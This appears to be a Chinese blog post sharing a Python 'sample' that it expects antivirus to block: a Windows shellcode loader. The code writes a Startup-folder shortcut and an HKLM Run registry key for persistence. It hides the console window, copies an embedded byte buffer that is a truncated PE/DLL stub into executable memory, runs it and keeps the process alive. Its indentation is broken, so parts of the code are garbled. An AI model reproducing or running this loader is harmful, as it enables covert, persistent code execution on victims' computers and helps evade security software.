看样本,这个生成出来的要被防护软件拦吧。

# -*- coding:utf-8 -*-
from ctypes import *

import ctypes
import re
import struct
import string
import binascii
import win32con
import win32api
import os
import sys
import pythoncom
import win32com.client as client
import hashlib
import time

def createShortCut(filename):  # 目前创建的无起始位置 - No starting position currently created
"""filename should be abspath, or there will be some strange errors"""
try:
    # 设置快捷方式的起始位置,此处设置为windows启动目录 - Set the starting position of the shortcut, here is set to the windows startup directory
    working_directory = os.getenv(
        'USERPROFILE') + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\'
    # 创建快捷方式的目标绝对路径 - The absolute path of the target to create the shortcut
    lnkname = working_directory + filename + '.lnk'
    # 要创建快捷方式的文件的绝对路径,此处是获取当前路径 - The absolute path of the file to create the shortcut, here is the current path
    filename = os.path.dirname(os.path.realpath(sys.argv[0])) + '\\' + filename
    shortcut = client.Dispatch("WScript.Shell").CreateShortCut(lnkname)
    shortcut.TargetPath = filename
    shortcut.save()
    print('配置开机自启') # Configure auto start
    except Exception as e:
    print(e.args)

   def set_shortcut(filename):  # 如无需特别设置图标,则可去掉iconname参数 - If you don’t need to set the icon, you can remove the iconname parameter
print(filename)
try:
    from win32com.shell import shell
    from win32com.shell import shellcon
    iconname = ""
    # 设置快捷方式的起始位置,此处设置为windows启动目录 - Set the starting position of the shortcut, here is set to the windows startup directory
    working_directory = os.getenv(
        'USERPROFILE') + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\'
    # 创建快捷方式的目标绝对路径 - The absolute path of the target to create the shortcut
    lnkname = working_directory + filename + '.lnk'
    print(lnkname)    
    # 要创建快捷方式的文件的绝对路径,此处是获取当前路径 - The absolute path of the file to create the shortcut, here is the current path
    #filename = os.path.dirname(os.path.realpath(sys.argv[0])) + '\\' + filename
    shortcut = pythoncom.CoCreateInstance(
        shell.CLSID_ShellLink, None,
        pythoncom.CLSCTX_INPROC_SERVER, shell.IID_IShellLink)
    #shortcut.SetPath(filename)
    shortcut.SetPath(sys.argv[0])
    # 设置快捷方式的起始位置, 不然会出现找不到辅助文件的情况 - Set the starting position of the shortcut, otherwise the auxiliary file will not be found
    shortcut.SetWorkingDirectory(working_directory)
    # 可有可无,没有就默认使用文件本身的图标 - Optional, if not, use the icon of the file itself by default
    shortcut.SetIconLocation(iconname, 0)
    if os.path.splitext(lnkname)[-1] != '.lnk':
        lnkname += ".lnk"
    shortcut.QueryInterface(pythoncom.IID_IPersistFile).Save(lnkname, 0)

    return True
except Exception as e:
    print(e.args)
    return False

  def addfile2autorun(name):
  try:
    runpath = "Software\Microsoft\Windows\CurrentVersion\Run"
    hKey = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, runpath, 0, win32con.KEY_SET_VALUE)
    win32api.RegSetValueEx(hKey, name, 0, win32con.REG_SZ, sys.argv[0])
    win32api.RegCloseKey(hKey)
  except Exception as e:
  pass
 def executable_code(buffer):
buf = c_char_p(buffer)
size = len(buffer)
addr = libc.valloc(size)
addr = c_void_p(addr)
if 0 == addr: 
    raise Exception("Failed to allocate memory")
memmove(addr, buf, size)
if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
    raise Exception("Failed to set protection on buffer")
return addr

def main():

buf =  b""
buf += b"\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5"
buf += b"\x81\xc3\x93\x45\x00\x00\xff\xd3\x81\xc3\x66\x62\x02"
buf += b"\x00\x53\x6a\x04\x50\xff\xd0\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x0e"
buf += b"\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
buf += b"\x54\x68\x69\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x20"
buf += b"\x63\x61\x6e\x6e\x6f\x74\x20\x62\x65\x20\x72\x75\x6e"
buf += b"\x20\x69\x6e\x20\x44\x4f\x53\x20\x6d\x6f\x64\x65\x2e"
buf += b"\x0d\x0d\x0a\x24\x00\x00\x00\x00\x00\x00\x00\x49\x9c"
buf += b"\x6e\x3a\x0d\xfd\x00\x69\x0d\xfd\x00\x69\x0d\xfd\x00"
buf += b"\x69\x4b\xac\xe1\x69\x29\xfd\x00\x69\x4b\xac\xdf\x69"
buf += b"\x1a\xfd\x00\x69\x4b\xac\xe0\x69\x8e\xfd\x00\x69\x0d"
buf += b"\xfd\x01\x69\xce\xfd\x00\x69\x04\x85\x93\x69\x1c\xfd"
buf += b"\x00\x69\x04\x85\x83\x69\x0c\xfd\x00\x69\x00\xaf\xe0"
buf += b"\x69\x17\xfd\x00\x69\x00\xaf\xdc\x69\x0c\xfd\x00\x69"
buf += b"\x00\xaf\xde\x69\x0c\xfd\x00\x69\x52\x69\x63\x68\x0d"
buf += b"\xfd\x00\x69\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x50\x45\x00\x00\x4c\x01\x04\x00\x3c\x97\x52\x5f"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x02\x21\x0b"
buf += b"\x01\x0c\x00\x00\xf6\x01\x00\x00\xe6\x00\x00\x00\x00"
buf += b"\x00\x00\xaa\x38\x01\x00\x00\x10\x00\x00\x00\x10\x02"


bufmd5 = get_md5_value(buf)  
set_shortcut("windows.dll-" + bufmd5)
addfile2autorun("windows.dll-" + bufmd5)

#libc = CDLL('libc.so.6')

PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4

VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(buf)
whnd = ctypes.windll.kernel32.GetConsoleWindow()   
if whnd != 0:
       if 6669999999999999999999999999999999999==6669999999999999999999999999999999999:
              ctypes.windll.user32.ShowWindow(whnd, 0)   
              ctypes.windll.kernel32.CloseHandle(whnd)
print ".................................."*666
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))

buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
#进程不能退出 - Process cannot exit
while True:
    time.sleep(1)

def get_md5_value(src):
myMd5 = hashlib.md5()
myMd5.update(src)
myMd5_Digest = myMd5.hexdigest()
return myMd5_Digest

if __name__ == '__main__':
main()

标签: py样本分享

添加新评论